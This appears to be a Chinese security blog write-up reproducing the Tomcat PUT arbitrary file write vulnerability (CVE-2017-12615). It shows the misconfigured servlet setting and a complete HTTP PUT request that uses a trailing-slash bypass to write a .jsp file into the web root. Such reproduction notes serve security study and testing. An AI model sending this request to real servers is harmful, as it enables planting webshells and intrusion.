Tomcat PUT 方法任意写文件漏洞(CVE-2017-12615)


Tomcat PUT 方法任意写文件漏洞(CVE-2017-12615)

漏洞原理

漏洞本质 Tomcat 配置了可写(readonly=false),导致我们可以往服务器写文件:

<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>debug</param-name>
        <param-value>0</param-value>
    </init-param>
    <init-param>
        <param-name>listings</param-name>
        <param-value>false</param-value>
    </init-param>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>

虽然 Tomcat 对文件后缀有一定检测(不能直接写jsp),但我们使用一些文件系统的特性(如Linux下可用/)来绕过了限制。

漏洞复现

直接发送以下数据包即可在 Web 根目录写入 shell:

PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell

文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
ThinkPHP5 SQL注入漏洞 && 敏感信息泄露 ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
ThinkPHP5 SQL注入漏洞 && 敏感信息泄露漏洞原理漏洞原理说明: https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html ht
2019-03-02
下一篇 
Tomcat 弱口令导致后台 getshell Tomcat 弱口令导致后台 getshell
Tomcat 弱口令导致后台 getshell复现环境Tomcat版本:8.0 Tomcat支持在后台部署 war 文件,可以直接将 webshell 部署到 web 目录下。其中,欲访问后台,需要对应用户有相应权限。 Tomcat7+ 权
2019-03-02
  目录